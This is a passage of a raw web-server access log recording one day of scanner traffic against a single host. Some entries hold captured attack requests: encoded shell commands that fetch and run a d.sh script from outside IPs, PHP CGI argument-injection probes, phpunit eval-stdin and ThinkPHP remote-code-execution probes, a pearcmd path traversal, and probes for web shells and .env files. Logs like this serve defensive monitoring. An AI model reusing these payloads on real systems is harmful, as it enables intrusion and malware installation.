Gecko) Chrome/72.0.3626.121 Safari/537.36" "-" +[27/Jan/2026:11:08:10 +0000] 400 - GET http 91.82.215.191 "/config/config.js" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[27/Jan/2026:11:08:11 +0000] 404 - GET http 91.82.215.191 "/settings.py" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-CA; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4" "-" +[27/Jan/2026:11:08:11 +0000] 404 - GET http 91.82.215.191 "/Admin/test" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Linux; Android 5.0; RCT6773W22B Build/LRX21M) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Safari/537.36" "-" +[27/Jan/2026:11:08:11 +0000] 404 - GET http 91.82.215.191 "/v1/test" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10.4; en-US; rv:1.9.2.28) Gecko/20120306 Firefox/3.6.28" "-" +[27/Jan/2026:11:08:11 +0000] 404 - GET http 91.82.215.191 "/en/test" [Client 78.153.140.179] [Length 150] [Gzip -] "Mozilla/5.0 (Linux; U; Android 2.3.6; en-us; SGH-T959V Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" "-" +[27/Jan/2026:11:08:11 +0000] 404 - GET http 91.82.215.191 "/st/test" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.109 Safari/537.36" "-" +[27/Jan/2026:11:08:11 +0000] 404 - GET http 91.82.215.191 "/Crm" [Client 78.153.140.179] [Length 552] [Gzip -] "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.241.0 Safari/532.4" "-" +[27/Jan/2026:11:10:09 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:11:12:40 +0000] 400 - GET http 91.82.215.191 "/" [Client 20.65.193.183] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[27/Jan/2026:11:12:40 +0000] 400 - - http localhost "-" [Client 20.65.193.183] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:11:16:42 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:11:20:54 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:11:23:49 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[27/Jan/2026:11:25:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 79.124.40.174] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:11:25:50 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:11:28:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:11:29:13 +0000] 400 - GET http 91.82.215.191 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[27/Jan/2026:11:35:31 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 5.183.209.196] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:11:38:16 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 216.180.246.64] [Length 1033] [Gzip -] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[27/Jan/2026:11:38:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.64] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:11:39:13 +0000] 200 - GET http 91.82.215.191 "/" [Client 216.180.246.64] [Length 568] [Gzip 1.86] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[27/Jan/2026:11:47:26 +0000] 200 - GET http 91.82.215.191 "/" [Client 203.153.232.253] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[27/Jan/2026:11:47:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.64] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:11:47:50 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[27/Jan/2026:11:49:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/.env" [Client 91.244.197.69] [Length 122] [Gzip 1.35] "python-requests/2.32.4" "-" +[27/Jan/2026:11:50:47 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:11:52:44 +0000] 404 - GET http 91.82.215.191 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:11:54:02 +0000] 404 - POST http 91.82.215.191 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Ftmp%20%7C%7C%20cd%20%2Fvar%2Frun%20%7C%7C%20cd%20%2Fmnt%20%7C%7C%20cd%20%2Froot%20%7C%7C%20cd%20%2F%3Bwget%20http:%2F%2F204.76.203.49%2Fd.sh%3Bchmod%20+x%20d.sh%3Bchmod%20777%20d.sh%3B.%2Fd.sh%20xp90%3Brm%20-f%20d.sh" [Client 204.76.203.49] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[27/Jan/2026:12:03:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:12:09:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:12:12:46 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:12:14:50 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:12:17:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:12:18:38 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 182.136.25.73] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:12:18:41 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 182.136.25.73] [Length 154] [Gzip -] "-" "-" +[27/Jan/2026:12:18:44 +0000] 404 - POST http 91.82.215.191 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:18:47 +0000] 405 - POST http 91.82.215.191 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 182.136.25.73] [Length 154] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:18:50 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:18:52 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:18:55 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:18:58 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:01 +0000] 404 - GET http 91.82.215.191 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:03 +0000] 404 - GET http 91.82.215.191 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:06 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:08 +0000] 404 - GET http 91.82.215.191 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:10 +0000] 404 - GET http 91.82.215.191 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:12 +0000] 404 - GET http 91.82.215.191 "/phpunit/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:14 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:16 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:19 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:21 +0000] 404 - GET http 91.82.215.191 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:24 +0000] 404 - GET http 91.82.215.191 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:27 +0000] 404 - GET http 91.82.215.191 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:29 +0000] 404 - GET http 91.82.215.191 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:32 +0000] 404 - GET http 91.82.215.191 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:35 +0000] 404 - GET http 91.82.215.191 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:38 +0000] 404 - GET http 91.82.215.191 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:41 +0000] 404 - GET http 91.82.215.191 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:44 +0000] 404 - GET http 91.82.215.191 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:47 +0000] 404 - GET http 91.82.215.191 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:49 +0000] 404 - GET http 91.82.215.191 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:52 +0000] 404 - GET http 91.82.215.191 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:54 +0000] 404 - GET http 91.82.215.191 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:19:57 +0000] 404 - GET http 91.82.215.191 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:00 +0000] 404 - GET http 91.82.215.191 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:03 +0000] 404 - GET http 91.82.215.191 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:06 +0000] 404 - GET http 91.82.215.191 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:09 +0000] 404 - GET http 91.82.215.191 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:11 +0000] 404 - GET http 91.82.215.191 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:14 +0000] 404 - GET http 91.82.215.191 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:16 +0000] 404 - GET http 91.82.215.191 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:18 +0000] 404 - GET http 91.82.215.191 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:21 +0000] 404 - GET http 91.82.215.191 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:24 +0000] 404 - GET http 91.82.215.191 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:27 +0000] 404 - GET http 91.82.215.191 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:30 +0000] 404 - GET http 91.82.215.191 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:32 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:35 +0000] 403 - GET http 91.82.215.191 "/index.php?lang=../../../../../../../../tmp/index1" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:20:38 +0000] 404 - GET http 91.82.215.191 "/containers/json" [Client 182.136.25.73] [Length 150] [Gzip -] "libredtail-http" "-" +[27/Jan/2026:12:25:16 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 77.83.39.197] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36" "-" +[27/Jan/2026:12:31:39 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:12:40:03 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:12:49:40 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:12:55:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:13:05:04 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:13:08:34 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:13:12:12 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:13:13:36 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:13:30:49 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:13:30:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.29.13.137] [Length 0] [Gzip -] "-" "-" +[27/Jan/2026:13:31:54 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[27/Jan/2026:13:37:11 +0000] 200 - GET http 91.82.215.191 "/" [Client 138.91.107.7] [Length 568] [Gzip 1.86] "Mozilla/5.0 zgrab/0.x" "-" +[27/Jan/2026:13:46:22 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:13:52:41 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:13:57:52 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:14:05:15 +0000] 404 - POST http 91.82.215.191 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd+%2Ftmp+%7C%7C+cd+%2Fvar%2Ftmp+%7C%7C+cd+%2Fvar%2Frun+%7C%7C+cd+%2Fmnt+%7C%7C+cd+%2Froot+%7C%7C+cd+%2F%3Brm+-rf+sys64%2A%3Bwget+http%3A%2F%2F204.76.203.49%2Fd.sh+%7C%7C+curl+-O+--connect-timeout+10+http%3A%2F%2F223.26.52.213%2Fd.sh%3Bchmod+%2Bx+d.sh%3Bchmod+777+d.sh%3B.%2Fd.sh+v5jxp90%3Brm+-f+d.sh%25%21%28EXTRA+string%3D223.26.52.213%2C+string%3D%2F%2C+string%3Dxp8%29" [Client 204.76.203.49] [Length 150] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[27/Jan/2026:14:07:21 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:14:14:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/p.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/s1.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:50 +0000] 404 - GET http profibot.direct.quickconnect.to "/k.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/as.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/xa.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:51 +0000] 404 - GET http profibot.direct.quickconnect.to "/bypass.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/about.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/re.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/m.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:52 +0000] 404 - GET http profibot.direct.quickconnect.to "/ad.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/222.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/buy.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/file.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:53 +0000] 404 - GET http profibot.direct.quickconnect.to "/999.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/chosen.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/ahax.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/f35.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/themes.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:14:14:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/footer.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/ma.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/amax.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/admin.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:14:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/assets/index.php" [Client 20.89.149.127] [Length 150] [Gzip -] "-" "-" +[27/Jan/2026:14:19:58 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:14:40:59 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:14:49:00 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:14:54:15 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[27/Jan/2026:14:58:25 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[27/Jan/2026:14:59:53 +0000] 404 - GET http 91.82.215.191 "/.env" [Client 45.156.87.161] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-" +[27/Jan/2026:15:14:29 +0000] 200 - GET http 91.82.215.191 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 